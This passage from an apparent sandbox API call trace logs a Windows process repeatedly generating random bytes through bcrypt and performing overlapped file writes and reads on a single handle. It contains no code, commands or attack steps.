(_Block=0x1fa91d0) [0195.747] free (_Block=0x1fa2ed8) [0195.747] free (_Block=0x1fa90b8) [0195.747] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.747] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.748] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.759] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xdb5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.759] CloseHandle (hObject=0x170) returned 1 [0195.759] free (_Block=0x3df0008) [0195.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.771] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.771] free (_Block=0x3e305b8) [0195.771] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.771] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.771] free (_Block=0x1fa91d0) [0195.771] free (_Block=0x1fa2ed8) [0195.771] free (_Block=0x1fa90b8) [0195.771] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.772] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.786] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe59, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.786] CloseHandle (hObject=0x170) returned 1 [0195.786] free (_Block=0x3df0008) [0195.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.795] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.796] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.796] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.796] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.796] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.796] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.797] free (_Block=0x3e305b8) [0195.797] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.797] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.797] free (_Block=0x1fa91d0) [0195.797] free (_Block=0x1fa2ed8) [0195.797] free (_Block=0x1fa90b8) [0195.797] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.798] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.810] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe2a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.811] CloseHandle (hObject=0x170) returned 1 [0195.811] free (_Block=0x3df0008) [0195.811] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.821] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.821] free (_Block=0x3e305b8) [0195.821] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.821] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.822] free (_Block=0x1fa91d0) [0195.822] free (_Block=0x1fa2ed8) [0195.822] free (_Block=0x1fa90b8) [0195.822] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.822] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.822] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.837] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe13, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.837] CloseHandle (hObject=0x170) returned 1 [0195.838] free (_Block=0x3df0008) [0195.838] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.859] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.859] free (_Block=0x3e305b8) [0195.859] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.859] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.859] free (_Block=0x1fa91d0) [0195.859] free (_Block=0x1fa2ed8) [0195.860] free (_Block=0x1fa90b8) [0195.860] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.860] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.860] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.871] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe39, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.872] CloseHandle (hObject=0x170) returned 1 [0195.872] free (_Block=0x3df0008) [0195.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.882] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.882] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.882] free (_Block=0x3e305b8) [0195.882] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.882] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.883] free (_Block=0x1fa91d0) [0195.883] free (_Block=0x1fa2ed8) [0195.883] free (_Block=0x1fa90b8) [0195.883] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.883] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.884] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.958] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe01, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.958] CloseHandle (hObject=0x170) returned 1 [0195.958] free (_Block=0x3df0008) [0195.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.968] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.968] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.968] free (_Block=0x3e305b8) [0195.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.968] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.969] free (_Block=0x1fa91d0) [0195.969] free (_Block=0x1fa2ed8) [0195.969] free (_Block=0x1fa90b8) [0195.969] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.970] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.981] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xe1d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.982] CloseHandle (hObject=0x170) returned 1 [0195.982] free (_Block=0x3df0008) [0195.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0195.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.992] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0195.992] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.992] free (_Block=0x3e305b8) [0195.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.992] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.993] free (_Block=0x1fa91d0) [0195.993] free (_Block=0x1fa2ed8) [0195.993] free (_Block=0x1fa90b8) [0195.993] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0195.993] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.994] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.005] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xeed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.005] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.005] CloseHandle (hObject=0x170) returned 1 [0196.005] free (_Block=0x3df0008) [0196.006] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0196.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0196.015] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0196.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0196.015] free (_Block=0x3e305b8) [0196.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0196.015] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0196.016] free (_Block=0x1fa91d0) [0196.016] free (_Block=0x1fa2ed8) [0196.016] free (_Block=0x1fa90b8) [0196.016] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0196.017] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0196.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, 